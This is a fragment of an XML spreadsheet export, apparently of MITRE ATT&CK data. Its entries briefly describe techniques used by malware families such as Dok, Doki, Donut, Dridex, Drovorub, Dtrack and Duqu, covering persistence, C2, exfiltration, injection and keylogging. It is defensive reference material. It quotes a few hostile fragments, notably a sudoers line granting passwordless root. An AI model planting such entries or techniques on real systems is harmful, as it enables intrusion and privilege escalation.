    <t>[Dok](https://attack.mitre.org/software/S0281) gives all users execute permissions for the application using the command &lt;code&gt;chmod +x /Users/Shared/AppStore.app&lt;/code&gt;.(Citation: CheckPoint Dok)</t>
  </si>
  <si>
    <t>relationship--8cb06251-a974-439f-8c36-a3fc65b7d154</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to install a login Item by sending Apple events to the &lt;code&gt;System Events&lt;/code&gt; process.(Citation: hexed osx.dok analysis 2019)</t>
  </si>
  <si>
    <t>relationship--d3e06c85-ec0b-4e6d-b1f0-f65ff9bc5e3a</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) downloads and installs [Tor](https://attack.mitre.org/software/S0183) via homebrew.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--a9bf9268-1c45-4293-a5c2-c493556ad546</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) is packed with an UPX executable packer.(Citation: hexed osx.dok analysis 2019)</t>
  </si>
  <si>
    <t>relationship--30db098c-7e7b-42bc-b4dc-f2b54e7dde65</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) adds &lt;code&gt;admin  ALL=(ALL) NOPASSWD: ALL&lt;/code&gt; to the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.(Citation: hexed osx.dok analysis 2019)</t>
  </si>
  <si>
    <t>relationship--a1ca87ad-0cfc-48e7-a0e4-cee3d81cf917</t>
  </si>
  <si>
    <t>S0600</t>
  </si>
  <si>
    <t>Doki</t>
  </si>
  <si>
    <t>malware--4f1c389e-a80e-4a3e-9b0e-9be8c91df64f</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the embedTLS library for network communications.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--521ca9cf-4ed0-4e24-a18a-b14252283d23</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--4a007e42-2efb-4ace-aa08-950bbee11df7</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) was run through a deployed container.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--78f508b9-0b72-4825-a076-9924eb9291fe</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the DynDNS service and a DGA based on the Dogecoin blockchain to generate C2 domains.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--26c10016-0df4-4dc0-a74b-4b0d51876965</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600)’s container was configured to bind the host root directory.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--46dd6393-93c7-4e61-8a47-ceecd5b77589</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used Ngrok to establish C2 and exfiltrate data.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--55af3bd0-d523-4394-99c6-182114c5cdc2</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) was executed through an open Docker daemon API port.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--eef34338-cf9a-4ba9-986d-f4d49a9d110a</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has resolved the path of a process PID to use as a script argument.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--93189ca3-7dfd-4c82-a7c7-a457a093d1d3</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has downloaded scripts from C2.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--6a556d19-33f1-4b6e-bec3-00ca32dd5df7</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has disguised a file as a Linux kernel module.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--be215fcd-d28a-4aa4-9d40-16f536f4e8cb</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has searched for the current process’s PID.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--fbfb4e97-11d5-497a-8d57-a9ebe5254f56</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has executed shell scripts with /bin/sh.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--7c9e8275-a3d5-42cf-9202-5737f98362ee</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has communicated with C2 over HTTPS.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--9c73f12f-5d20-47f4-8052-d4218d681753</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the dogechain.info API to generate a C2 address.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>relationship--b94f2e1a-a364-4bf1-af63-f9ce2b7de89b</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via Ruby.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>relationship--34351a4f-ea7c-4420-9063-1d8644073ea7</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can patch Antimalware Scan Interface (AMSI), Windows Lockdown Policy (WLDP), as well as exit-related [Native API](https://attack.mitre.org/techniques/T1106) functions to avoid process termination.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>relationship--d22ecd26-4361-4266-8cd7-94af7418d4ee</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) can erase file references to payloads in-memory after being reflectively loaded and executed.(Citation: Donut Github)</t>
  </si>
  <si>
    <t>relationship--07f86f87-71bf-4f6b-b902-e6e4d912e2d6</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) can download and execute previously staged shellcode payloads.(Citation: Donut Github)</t>
  </si>
  <si>
    <t>relationship--c720f9ab-106c-47ce-b327-83727be6d35a</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via JavaScript or JScript.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>relationship--8be670ce-f8bd-4f67-9f84-3e278235325a</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) code modules use various API functions to load and inject code.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>relationship--a107acee-85a7-475c-bb99-c12a379ef2dc</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) can generate encrypted, compressed/encoded, or otherwise obfuscated code modules.(Citation: Donut Github)</t>
  </si>
  <si>
    <t>relationship--44b10433-b9b4-46d1-825b-6fe4183dc9c0</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via PowerShell.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>relationship--bec1b07a-6a67-469e-8b87-246e950d86b2</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) includes subprojects that enumerate and identify information about [Process Injection](https://attack.mitre.org/techniques/T1055) candidates.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>relationship--59945377-5b77-4267-ae36-9feebccc42f3</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) includes a subproject &lt;code&gt;DonutTest&lt;/code&gt; to inject shellcode into a target process.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>relationship--2c6c5572-9b89-40cd-8faa-6317945cf939</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via Python.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>relationship--15b1bc2a-4cd1-4b82-90b0-2aa6e69637c7</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads.(Citation: Donut Github)</t>
  </si>
  <si>
    <t>relationship--a7cba2fb-a90f-4dd1-ae33-3747d5a9c873</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate packed code modules.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>relationship--60d3d7d8-408e-4663-b081-69fe66303983</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via VBScript.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>relationship--415b6755-70d1-433c-b076-3598dcaa9c7d</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) can use HTTP to download previously staged shellcode payloads.(Citation: Donut Github)</t>
  </si>
  <si>
    <t>relationship--717079c0-7f34-42f6-927f-9ee321447c13</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses PowerShell for execution.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>relationship--e3909a5f-ebfb-48e1-b0fc-5737217a994b</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) searches and reads the value of the Windows Update Registry Run key.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>relationship--521146dd-185d-4a8c-a3b4-b3caedbc7a14</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses PowerShell to add a Registry Run key in order to establish persistence.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>relationship--82826722-4278-438e-a8d0-5bd9fd117b2b</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) collects the victim host name and serial number, and then sends the information to the C2 server.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>relationship--396edbf6-41b5-4377-90b6-4967c24de7fb</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) collects the victim username and sends it to the C2 server.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>relationship--6cf42ee6-a064-4d8a-99d4-8aa0f878ae2a</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) communicates to its C2 server over HTTP.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>relationship--d7bb00a0-fbe6-4622-84ed-be32ff5d8561</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses the command line.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>relationship--ef318b23-1b8c-4c24-ad20-09c0977a73b3</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) bypasses UAC to escalate privileges by using a custom “RedirectEXE” shim database.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>relationship--6a0f3ebb-c805-402f-bb2e-aac2f8d174fa</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>relationship--f4f5b6a4-26d5-4352-a25d-001a51a0a121</t>
  </si>
  <si>
    <t>After downloading its main config file, [Downdelph](https://attack.mitre.org/software/S0134) downloads multiple payloads from C2 servers.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>relationship--9c7a9bd0-4f52-4c10-8e79-3b6e72d431d1</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>relationship--0e27ebb3-2d48-48f6-ab99-968c0a992c61</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) uses RC4 to encrypt C2 responses.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>relationship--9253e8b3-9fbb-4149-a2e4-60d36c006ba6</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has encrypted traffic with RSA.(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>relationship--68c412d7-9b6e-4a0e-a29f-69c1d8065156</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.(Citation: Dell Dridex Oct 2015)</t>
  </si>
  <si>
    <t>relationship--3f3fffec-6c91-45e2-8c4c-d1c7bdcde76b</t>
  </si>
  <si>
    <t>31 May 2019</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) can abuse legitimate Windows executables to side-load malicious DLL files.(Citation: Red Canary Dridex Threat Report 2021)</t>
  </si>
  <si>
    <t>relationship--112b896f-a3df-4b7c-80cd-332d561bc028</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t>relationship--e884cc7d-cea1-4ecc-84fb-5c31950b4357</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t>relationship--e496b3d5-3608-49e6-9567-86b370abeeb3</t>
  </si>
  <si>
    <t xml:space="preserve">[Dridex](https://attack.mitre.org/software/S0384) has used the &lt;code&gt;OutputDebugStringW&lt;/code&gt; function to avoid malware analysis as part of its anti-debugging technique.(Citation: Checkpoint Dridex Jan 2021) </t>
  </si>
  <si>
    <t>relationship--19e06de9-b9a1-4532-94c6-f729036ba0c3</t>
  </si>
  <si>
    <t xml:space="preserve">[Dridex](https://attack.mitre.org/software/S0384)'s strings are obfuscated using RC4.(Citation: Checkpoint Dridex Jan 2021) </t>
  </si>
  <si>
    <t>relationship--6b8d8354-0fa9-4a45-8df9-57709beace42</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</si>
  <si>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</si>
  <si>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relationship--6f7ee9ba-fb3d-4f22-a78a-8003da718ec4</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) can use `regsvr32.exe` to initiate malicious code.(Citation: Red Canary Dridex Threat Report 2021)</t>
  </si>
  <si>
    <t>relationship--4c29de08-20be-4358-acfd-c4939a83c14b</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) contains a module for VNC.(Citation: Dell Dridex Oct 2015)</t>
  </si>
  <si>
    <t>relationship--11d5cf7f-7b0c-49b3-b8d0-9906f440d2d0</t>
  </si>
  <si>
    <t xml:space="preserve">[Dridex](https://attack.mitre.org/software/S0384) can maintain persistence via the creation of scheduled tasks within system directories such as `windows\system32\`, `windows\syswow64,` `winnt\system32`, and `winnt\syswow64`.(Citation: Red Canary Dridex Threat Report 2021) </t>
  </si>
  <si>
    <t>relationship--3da68907-c8f3-4a45-b831-bdadb1161921</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has collected a list of installed software on the system.(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t>relationship--41e8c16e-bfef-415f-b898-b76a1f527cc2</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has encrypted traffic with RC4.(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>relationship--0245022b-05ac-4d66-ae9f-e4c2f604c07a</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has collected the computer name and OS architecture information from the system.(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t>relationship--9dfb9740-1641-4306-8ee8-38318be3ae42</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has used POST requests and HTTPS for C2 communications.(Citation: Kaspersky Dridex May 2017)(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t>relationship--43286c59-80a4-40d3-9aaa-ff7e6f321871</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can unarchive data downloaded from the C2 to obtain the payload and persistence modules.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--8e2b7383-c6dc-40c1-bb88-3176ff98c9dc</t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) has used legitimate web services to exfiltrate data.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--6e6910db-1606-43a2-9812-22b5597d8472</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can collect the names of all files and folders in the Program Files directories.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--4a358258-d616-4f15-aead-d4e6f6153aae</t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) can download and execute additional files.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--867a1701-c263-4582-ad1c-7c0baae2cf23</t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--088cbe38-25e2-42a0-b65e-252bb1865d18</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) has checked for the presence of Arabic language in the infected machine's settings.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--e11c02c8-e740-489f-925f-33c05c94c80f</t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) has checked for the presence of Arabic language in the infected machine's settings.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--b0b2abea-e4a0-4e96-8e71-9ff49b4759f7</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</si>
  <si>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</si>
  <si>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relationship--54e5545a-6fdc-4bfe-af74-2c80416ed936</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can execute arbitrary shell commands on the victims' machines.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--23faa436-b299-4b94-9284-fe80d6c5d312</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can transfer files from the victim machine.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--08a74c86-5a98-4634-a93c-9c192d3e4fc9</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has de-obsfuscated XOR encrypted payloads in WebSocket messages.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--994846d3-7130-4374-bd6e-278ad870fa94</t>
  </si>
  <si>
    <t>26 August 2020</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can exfiltrate files over C2 infrastructure.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--a12ce761-4e08-4fcd-b00a-7b5eb082fda4</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can delete specific files from a compromised host.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--25609fb5-4f73-47ba-882e-56a421b7b566</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can download files to a compromised host.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--f3b7dbe2-1dd5-4d57-a5ef-1764775d5c99</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use a port forwarding rule on its agent module to relay network traffic through the client module to a remote host on the same network.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--3ff468a6-c444-439e-b095-dda4648f3561</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use kernel modules to establish persistence.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--2cc2c087-e567-462a-80e6-059fd1276199</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use TCP to communicate between its agent and client modules.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--37b9ae2f-a386-41aa-90be-497de2d580f5</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has used XOR encrypted payloads in WebSocket client to server messages.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--20196489-8426-4cb7-a8f0-ca51bef7a385</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--3da780a6-2bd0-47ce-b434-fe513abb7ee5</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can execute arbitrary commands as root on a compromised system.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--49eef071-24e0-456b-b4e7-618ab601c6f4</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>relationship--029a75f4-62a8-4c9e-bdf2-ea2d8aed8900</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) packs collected data into a password protected archive.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>relationship--d80207ae-0b3c-4f5f-ac89-9caa8c2c9beb</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s RAT makes a persistent target file with auto execution on the host start.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>relationship--2e9d5640-a88d-4812-b2dc-a94621a95959</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can retrieve browser history.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--4b83387a-bba5-44a9-9dc4-3aae9a916d24</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect a variety of information from victim machines.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--1029fab5-5714-42d0-ac04-78f4c76c3c02</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used a decryption routine that is part of an executable physical patch.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>relationship--ff8241d6-2a4c-41ea-b86d-43082ca0fb48</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used a dropper that embeds an encrypted payload as extra data.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>relationship--66f7fca6-b5cc-46e4-86a1-204f4b1038fa</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can remove its persistence and delete itself.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>relationship--434cc89e-291d-44e7-b18a-9710c659bd64</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can list files on available disk volumes.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--9866c9ca-d769-458c-9797-112beb97498d</t>
  </si>
  <si>
    <t>One of [Dtrack](https://attack.mitre.org/software/S0567) can replace the normal flow of a program execution with malicious code.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--28291398-1281-404e-9603-8aae5a5a9919</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s can download and upload a file to the victim’s computer.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--ef463100-ac00-44ab-805b-75e4c8886699</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s dropper contains a keylogging executable.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>relationship--28bde4e9-cc84-4356-a872-b18fc3dd49ab</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can save collected data to disk, different file formats, and network shares.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--118d9413-0b34-47e6-b333-b712e78dc404</t>
  </si>
  <si>
    <t>One of [Dtrack](https://attack.mitre.org/software/S0567) can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--5449bc94-31c6-471a-8525-23af9cdc25bd</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s dropper can list all running processes.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--be366a5f-308d-42aa-ae76-f14dbbb8b136</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used process hollowing shellcode to target a predefined list of processes from &lt;code&gt;%SYSTEM32%&lt;/code&gt;.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>relationship--8906c905-87ff-48bf-b17e-1b8397ef062e</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the RegisteredOwner, RegisteredOrganization, and InstallDate registry values.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--6b55412a-760f-4ff8-b48a-6ff3bed8b0e9</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) contains a function that calls &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt;.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--e07d9070-6989-43e7-aee0-1b18aff1ffbe</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the victim's computer name, hostname and adapter information to create a unique identifier.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--1b47deed-a8b9-4e0f-a47e-9570ecccaa90</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the host's IP addresses using the &lt;code&gt;ipconfig&lt;/code&gt; command.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--9f0f2cd3-5bcb-48c9-812f-f8a37f3dfdd3</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect network and active connection information.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>relationship--61929ceb-3933-46f1-a11b-4d67482b1d59</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) used hard-coded credentials to gain access to a network share.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--3916c36b-bd92-4070-bc9a-6eab3d78cabd</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used &lt;code&gt;cmd.exe&lt;/code&gt; to add a persistent service.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--383eccfd-da19-4b2e-9e9c-0e36c876c2ee</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can add a service called WBService to establish persistence.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>relationship--372ff318-25a5-476b-9090-7e0fd4534325</t>
  </si>
  <si>
    <t>S0038</t>
  </si>
  <si>
    <t>Duqu</t>
  </si>
  <si>
    <t>malware--68dca94f-c11d-421e-9287-7c501108e18c</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</si>
  <si>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</si>
  <si>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relationship--968610c5-7fa5-4840-b9bb-2f70eecd87fa</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--8d0d938e-2e4c-49e8-9290-6bfb86161260</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on open windows.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--bbc31a33-f55f-43d4-a3fd-23426c5fc638</t>
  </si>
  <si>
    <t>Modules can be pushed to and executed by [Duqu](https://attack.mitre.org/software/S0038) that copy data to a staging area, compress it, and XOR encrypt it.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--0f3af4de-b1cc-4cc2-9eb7-9aa46cdebfcd</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</si>
  <si>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</si>
  <si>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relationship--7c3b845e-56ca-4580-b060-a3fa42b86a86</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--1451c4a3-5dc6-4744-8120-197f3a3134c1</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) can track key presses with a keylogger module.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--0b823cda-4775-4690-9ea6-02bbaa3522a1</t>
  </si>
  <si>
